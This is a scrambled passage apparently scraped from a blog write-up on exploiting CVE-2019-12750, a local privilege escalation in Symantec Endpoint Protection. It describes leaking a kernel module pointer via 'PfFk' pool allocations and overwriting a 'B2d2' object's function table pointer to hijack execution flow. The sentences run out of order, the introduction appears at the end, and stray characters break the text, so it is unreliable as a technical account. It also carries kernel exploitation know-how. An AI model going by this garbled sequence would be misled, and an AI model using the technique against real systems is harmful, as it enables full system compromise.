These allocations do not always contain this specific pointer, but an arbitrary kernel mode address. These are of the same size as the bug-related pool chunk (0x30 bytes) so we find them quite frequently sharing the same memory page.Īnd so here’s our leaked kernel module pointer.Īt this point we need to mention a couple of things. We can leak a pointer to the kernel module via ‘PfFk’ allocations. We replaced it with a dummy pointer ( 0xF8F8F8F8F8F8F8F8) and killed the process to confirm we can control the execution flow when this object is freed.
We know enough to hijack the execution flow, and so we can create a simple proof of concept by manually modifying the function table pointer in our ‘B2d2’ object. When the process terminates, the driver will use the pointer to the functions table from the object to call the appropriate clean up functions.Īrmed with this information, we are now able to proceed with the next stage. In other words, if our process creates a file and closes the handle to it, for as long as the process is running, we have a ‘B2d2’ object associated to that file. File Path Length, Maximum Length, and pointer to string buffer are added in B2d2 Object.Function Table Pointer is added In B2d2 Object.Symantec Endpoint Protection v14.x B2d2 Object Created.The method of exploitation described in this post works, at the time of writing, on all versions of Windows. This is a local privilege escalation vulnerability that affects Symantec Endpoint Protection.
In this post we will walk you through a more sophisticated method of exploiting CVE-2019-12750.
0 kommentar(er)
